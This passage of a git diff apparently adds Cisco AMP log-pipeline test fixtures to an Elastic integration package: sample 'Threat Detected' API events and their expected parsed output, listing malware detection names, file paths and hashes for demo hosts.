Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} \ No newline at end of file diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json new file mode 100644 index 00000000000..fb0cb6dbbed --- /dev/null +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json 
@@ -0,0 +1,3825 @@ +{ + "expected": [ + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581709368Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251512150196256\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.DFC.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196256", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "sha256": 
"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581713543Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196255", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581715796Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":365000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196254\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196254", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581730632Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":350000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196253\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196253", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581733039Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196252", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581734917Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
